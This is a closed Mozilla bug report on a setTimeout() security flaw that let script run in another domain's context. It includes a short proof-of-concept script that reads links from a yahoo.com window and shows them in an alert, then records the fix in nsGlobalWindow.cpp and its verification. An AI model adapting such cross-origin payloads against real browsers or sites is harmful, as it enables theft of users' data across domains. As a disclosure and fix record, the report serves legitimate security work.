Closed Bug 16166 Opened 26 years ago Closed 26 years ago

setTimeout() security problem

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

The setTimeout() method allows executing JavaScript code in the security context of documents from any domain. The code is: ---------------------------------------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com"); window.x="s='Here are some links: ';for(i=0;i< ( (document.links.length < 10) ? document.links.length : 10) ;i++) s += document.links[i].href +String.fromCharCode(10);alert(s);"; setTimeout("a.setTimeout('eval(opener.x)',1000);",10000); </SCRIPT> //opener.x may be circumvented ----------------------------------------------------------------------
Status: NEW → ASSIGNED
The principal for the timeout was being fetched from the window, not from the currently executing code.
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Checking in dom/src/base/nsGlobalWindow.cpp; /m/pub/mozilla/dom/src/base/nsGlobalWindow.cpp,v <-- nsGlobalWindow.cpp new revision: 1.157; previous revision: 1.156 done
Blocks: 16950
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.